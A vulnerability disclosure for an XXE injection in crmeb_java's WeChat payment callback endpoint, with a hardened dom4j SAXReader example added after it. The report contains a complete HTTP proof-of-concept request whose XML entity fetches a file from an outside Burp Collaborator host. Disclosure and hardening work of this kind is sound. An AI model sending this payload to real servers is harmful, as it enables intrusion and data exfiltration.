[Vulnerability details]
Send the crafted request package to the API interface /api/admin/payment/callback/wechat
```http
POST /api/admin/payment/callback/wechat HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Content-Type: application/xml
Content-Length: 239

<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://3qurglf920zqknzhgryal9ip7gd61v.burpcollaborator.net/evil.xml" >]><return_code>&xxe;</return_code><return_msg><![CDATA[OK]]></return_msg>
```
[Impact Code execution]
true
[Cause of vulnerability]
The interface /api/admin/payment/callback/wechat calls the function weChat.
If the xmlInfo is not blank, the function processResponseXml will be called.
Then it calls the function xmlToMap to process the XML.
There is an XXE Injection vulnerability with the SAXReader component.
That's all, thanks.
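As an added example (not code from the crmeb_java project), the following shows how a dom4j SAXReader can be configured so that a callback body carrying a DOCTYPE like the one in the request above is rejected before any entity is resolved. The `xmlToMap` method here is a hypothetical stand-in for the routine the report names, and the sample bodies are constructed, not captured traffic.

```java
import java.io.StringReader;
import java.util.HashMap;
import java.util.Map;
import org.dom4j.Document;
import org.dom4j.DocumentException;
import org.dom4j.Element;
import org.dom4j.io.SAXReader;
import org.xml.sax.SAXException;

public class SafeWeChatXml {

    // The payment callback body is chosen by whoever sends the POST, so the reader
    // must refuse DOCTYPE declarations and never fetch external entities or DTDs.
    static SAXReader hardenedReader() throws SAXException {
        SAXReader reader = new SAXReader();
        // Reject any <!DOCTYPE ...> outright; a WeChat callback never needs one.
        reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case the parser in use ignores the feature above.
        reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return reader;
    }

    // Hypothetical xmlToMap: flattens the root element's children into name -> text.
    static Map<String, String> xmlToMap(String xml) throws DocumentException, SAXException {
        Document doc = hardenedReader().read(new StringReader(xml));
        Map<String, String> out = new HashMap<>();
        for (Object o : doc.getRootElement().elements()) {   // raw List in older dom4j
            Element child = (Element) o;
            out.put(child.getName(), child.getTextTrim());
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign callback body: parses normally.
        String benign = "<xml><return_code><![CDATA[SUCCESS]]></return_code>"
                      + "<return_msg><![CDATA[OK]]></return_msg></xml>";
        System.out.println(xmlToMap(benign));

        // Constructed body with a DOCTYPE and an entity reference: rejected by the reader.
        String withDoctype = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY x \"test\">]>"
                           + "<xml><return_code>&x;</return_code></xml>";
        try {
            xmlToMap(withDoctype);
        } catch (DocumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```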
[Suggested description]
There is an XXE Injection vulnerability in crmeb_java <=1.3.4, which is triggered by the SAXReader component.
[Vulnerability Type]
XML External Entity (XXE) Injection
[Vendor of Product]
https://github.com/crmeb/crmeb_java
[Affected Product Code Base]
<=1.3.4
[Affected Component]
/api/admin/payment/callback/wechat
[Attack Type]
Remote